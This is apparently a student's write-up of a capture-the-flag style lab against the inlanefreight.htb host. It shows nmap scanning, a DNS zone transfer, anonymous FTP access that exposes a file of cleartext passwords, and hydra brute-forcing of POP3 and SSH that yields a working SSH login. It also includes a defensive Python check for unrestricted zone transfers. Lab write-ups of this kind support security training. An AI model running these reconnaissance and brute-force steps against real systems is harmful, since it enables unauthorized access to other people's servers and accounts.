Acs Medium Lab

Context:

  • internal server
  • inlanefreight.htb domain
  • manages and stores emails and files
  • serves as a backup of some of the company's processes
  • used relatively rarely
  • has only been used for testing purposes

nmap:
scan all ports because there's a non-standard port open

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
53/tcp  open  domain   ISC BIND 9.16.1 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.16.1-Ubuntu
110/tcp open  pop3     Dovecot pop3d
|_pop3-capabilities: USER UIDL TOP CAPA STLS PIPELINING SASL(PLAIN) AUTH-RESP-CODE RESP-CODES
995/tcp open  ssl/pop3 Dovecot pop3d
|_ssl-date: TLS randomness does not represent time
|_pop3-capabilities: SASL(PLAIN) USER PIPELINING RESP-CODES TOP AUTH-RESP-CODE CAPA UIDL
| ssl-cert: Subject: commonName=ubuntu
| Subject Alternative Name: DNS:ubuntu
| Not valid before: 2022-04-11T16:38:55
|_Not valid after:  2032-04-08T16:38:55
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

This is an Ubuntu Linux machine running SSH, DNS, POP3 and POP3 over SSL.
I had to restart the machine to see the non-standard ports.

2121/tcp  open  ftp
30021/tcp open  ftp
PORT      STATE SERVICE      VERSION
2121/tcp  open  ccproxy-ftp?
| fingerprint-strings: 
|   GenericLines: 
|     220 ProFTPD Server (InlaneFTP) [10.129.180.139]
|     Invalid command: try being more creative
30021/tcp open  unknown
| fingerprint-strings: 
|   GenericLines: 
|     220 ProFTPD Server (Internal FTP) [10.129.180.139]
|     Invalid command: try being more creative

Brute-forcing POP3

hydra -L users.list -P pws.list -f 10.129.56.161 pop3

failed

Attempt Zone Transfer #DNS #zone_transfer

dig axfr inlanefreight.htb @10.129.56.161
inlanefreight.htb.      604800  IN      SOA     inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800
inlanefreight.htb.      604800  IN      NS      ns.inlanefreight.htb.
app.inlanefreight.htb.  604800  IN      A       10.129.200.5
dc1.inlanefreight.htb.  604800  IN      A       10.129.100.10
dc2.inlanefreight.htb.  604800  IN      A       10.129.200.10
int-ftp.inlanefreight.htb. 604800 IN    A       127.0.0.1
int-nfs.inlanefreight.htb. 604800 IN    A       10.129.200.70
ns.inlanefreight.htb.   604800  IN      A       127.0.0.1
un.inlanefreight.htb.   604800  IN      A       10.129.200.142
ws1.inlanefreight.htb.  604800  IN      A       10.129.200.101
ws2.inlanefreight.htb.  604800  IN      A       10.129.200.102
wsus.inlanefreight.htb. 604800  IN      A       10.129.200.80
inlanefreight.htb.      604800  IN      SOA     inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800
;; Query time: 76 msec
;; SERVER: 10.129.56.161#53(10.129.56.161) (TCP)
;; WHEN: Sat Jan 11 07:22:41 EST 2025
;; XFR size: 13 records (messages 1, bytes 372)

I can see that there is an internal FTP server and an internal NFS server, and there's root.inlanefreight.htb.
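As an added defender-side check (not part of the original lab notes), the following parses dig's AXFR output and summarises what an unrestricted transfer handed out: whether the transfer was complete (SOA at both ends) and which A records point at loopback or private hosts. It assumes dig's presentation format and embeds a constructed subset of the records returned above so it runs offline.

```python
import ipaddress
import re

# Constructed sample: a subset of the records the dig AXFR above returned,
# plus dig's ';;' trailer, embedded so the check runs offline.
AXFR_OUTPUT = """\
inlanefreight.htb.      604800  IN      SOA     inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800
inlanefreight.htb.      604800  IN      NS      ns.inlanefreight.htb.
app.inlanefreight.htb.  604800  IN      A       10.129.200.5
int-ftp.inlanefreight.htb. 604800 IN    A       127.0.0.1
int-nfs.inlanefreight.htb. 604800 IN    A       10.129.200.70
ns.inlanefreight.htb.   604800  IN      A       127.0.0.1
inlanefreight.htb.      604800  IN      SOA     inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800
;; Query time: 76 msec
"""

RR_RE = re.compile(r"^(\S+)\s+(\d+)\s+IN\s+(\S+)\s+(.+)$")  # name ttl IN type rdata

def parse_axfr(text):
    """Turn dig AXFR output into (name, ttl, type, rdata) tuples; ';;' lines are skipped."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        m = RR_RE.match(line)
        if m:
            name, ttl, rtype, rdata = m.groups()
            records.append((name.lower(), int(ttl), rtype.upper(), rdata.strip()))
    return records

def audit_zone(records):
    """Report whether the transfer was complete (SOA at both ends) and which
    A records expose loopback-bound services or private internal hosts."""
    report = {"records": len(records), "loopback_hosts": [], "private_hosts": [],
              "complete_transfer": bool(records) and records[0][2] == "SOA"
              and records[-1][2] == "SOA"}
    for name, _ttl, rtype, rdata in records:
        if rtype != "A":
            continue
        try:
            ip = ipaddress.ip_address(rdata)
        except ValueError:
            continue  # rdata is not an address; skip
        if ip.is_loopback:      # service lives on the DNS host itself
            report["loopback_hosts"].append(name)
        elif ip.is_private:     # internal topology handed to any requester
            report["private_hosts"].append(name)
    return report
```

The fix on the server side is to restrict transfers to the secondaries (BIND's allow-transfer), after which this check reports no records at all.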

Attempting anonymous FTP
#default_credentials #FTP

ftp 10.129.180.139 30021

Worked.
The directory is called simon, which is probably the username.
Also got a text file:

└─$ cat mynotes.txt      
234987123948729384293
+23358093845098
ThatsMyBigDog
Rock!ng#May
Puuuuuh7823328
8Ns8j1b!23hs4921smHzwn
237oHs71ohls18H127!!9skaP
238u1xjn1923nZGSb261Bs81

Maybe this is a list of passwords?
#cleartext_credentials

Brute-forcing SSH
#brute_forcing_SSH

hydra -l simon -P mypwd.list ssh://10.129.180.139

Got credentials:
simon:8Ns8j1b!23hs4921smHzwn

SSH into the target and got the flag.